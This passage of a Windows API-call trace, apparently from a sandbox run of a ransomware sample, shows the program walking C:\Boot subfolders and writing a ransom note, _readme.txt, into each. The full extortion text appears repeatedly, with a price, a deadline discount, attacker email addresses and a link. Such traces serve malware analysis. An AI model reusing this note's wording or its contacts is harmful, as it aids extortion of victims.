ID:\r\n0200a7d6a8sdaywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 1112 [0090.935] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x316f0d0 [0090.935] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3189d50 | out: hHeap=0x680000) returned 1 [0090.935] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0090.935] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sdaywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT") returned 1111 [0090.935] WriteFile (in: hFile=0x5cc, lpBuffer=0x316f0d0*, nNumberOfBytesToWrite=0x457, lpNumberOfBytesWritten=0x9ccfb64, lpOverlapped=0x0 | out: lpBuffer=0x316f0d0*, lpNumberOfBytesWritten=0x9ccfb64*=0x457, lpOverlapped=0x0) returned 1 [0090.937] CloseHandle (hObject=0x5cc) returned 1 [0090.937] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316f0d0 | out: hHeap=0x680000) returned 1 [0090.937] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99cad78 | out: hHeap=0x680000) returned 1 [0090.937] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f52d8 | out: hHeap=0x680000) returned 1 [0090.937] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.937] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef1d0 [0090.937] FindFirstFileW (in: lpFileName="C:\\Boot\\ru-RU\\*", lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa3430f20, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa3430f20, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6bdca8 [0090.938] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef1d0 | out: hHeap=0x680000) returned 1 [0090.938] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa3430f20, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa3430f20, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0090.938] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0090.938] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa3430f20, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa3430f20, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa3457080, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x457, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0090.938] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa3430f20, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa3430f20, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa3457080, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x457, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0090.938] FindClose (in: hFindFile=0x6bdca8 | out: hFindFile=0x6bdca8) returned 1 [0090.938] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.938] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef28 | out: hHeap=0x680000) returned 1 [0090.938] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef28 [0090.938] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0090.938] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef1d0 [0090.938] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.938] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.938] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef1d0 | out: hHeap=0x680000) returned 1 [0090.938] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef1d0 [0090.938] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.938] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.938] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef1d0 | out: hHeap=0x680000) returned 1 [0090.938] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef1d0 [0090.938] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.938] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.939] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef1d0 | out: hHeap=0x680000) returned 1 [0090.939] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef1d0 [0090.939] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.939] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.939] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef1d0 | out: hHeap=0x680000) returned 1 [0090.939] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef1d0 [0090.939] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.939] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.939] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef1d0 | out: hHeap=0x680000) returned 1 [0090.939] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef1d0 [0090.939] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0090.939] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.939] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef1d0 | out: hHeap=0x680000) returned 1 [0090.939] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef1d0 [0090.939] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.939] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc2e) returned 0x99e3968 [0090.939] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.939] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3968 | out: hHeap=0x680000) returned 1 [0090.939] PathFindFileNameW (pszPath="C:\\Boot\\sv-SE\\") returned="sv-SE\\" [0090.939] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.939] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0090.939] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0090.939] PathFindFileNameW (pszPath="") returned="" [0090.940] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.940] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75670000 [0090.940] GetProcAddress (hModule=0x75670000, lpProcName="SHGetFolderPathW") returned 0x756f5708 [0090.940] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x800) returned 0x31d1120 [0090.940] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x31d1120 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0090.940] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x810) returned 0x99ca4f0 [0090.940] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef1d0 [0090.941] FreeLibrary (hLibModule=0x75670000) returned 1 [0090.941] PathAppendW (in: pszPath="C:\\Boot\\sv-SE\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\sv-SE\\_readme.txt") returned 1 [0090.941] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.941] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.941] PathFileExistsW (pszPath="C:\\Boot\\sv-SE\\_readme.txt") returned 0 [0090.941] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x7d00) returned 0x99f52d8 [0090.941] lstrcpyW (in: lpString1=0x99f52d8, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sda" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sda") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sda" [0090.941] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sda", lpString2="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sdaywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sdaywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT" [0090.941] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99cad78 [0090.941] CreateFileW (lpFileName="C:\\Boot\\sv-SE\\_readme.txt" (normalized: "c:\\boot\\sv-se\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0090.945] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8b0) returned 0x31cf750 [0090.945] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x857) returned 0x3189d50 [0090.945] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sdaywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x3189d50, cbMultiByte=2135, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sdaywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 1112 [0090.945] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x316f0d0 [0090.945] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3189d50 | out: hHeap=0x680000) returned 1 [0090.945] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0090.945] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sdaywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT") returned 1111 [0090.945] WriteFile (in: hFile=0x5cc, lpBuffer=0x316f0d0*, nNumberOfBytesToWrite=0x457, lpNumberOfBytesWritten=0x9ccfb64, lpOverlapped=0x0 | out: lpBuffer=0x316f0d0*, lpNumberOfBytesWritten=0x9ccfb64*=0x457, lpOverlapped=0x0) returned 1 [0090.946] CloseHandle (hObject=0x5cc) returned 1 [0090.946] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316f0d0 | out: hHeap=0x680000) returned 1 [0090.946] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99cad78 | out: hHeap=0x680000) returned 1 [0090.946] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f52d8 | out: hHeap=0x680000) returned 1 [0090.946] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.946] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.946] FindFirstFileW (in: lpFileName="C:\\Boot\\sv-SE\\*", lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa3457080, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa3457080, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6bdca8 [0090.947] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.947] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa3457080, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa3457080, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0090.947] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0090.947] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa3457080, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa3457080, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa3457080, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x457, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0090.947] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa3457080, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa3457080, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa3457080, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x457, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0090.947] FindClose (in: hFindFile=0x6bdca8 | out: hFindFile=0x6bdca8) returned 1 [0090.947] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.947] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef28 | out: hHeap=0x680000) returned 1 [0090.947] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef28 [0090.947] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0090.947] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.947] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.947] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.947] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.947] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.947] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.947] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.947] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.947] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.947] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.947] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.947] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.947] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.947] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.947] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.947] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.947] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.947] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.947] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.947] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.948] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 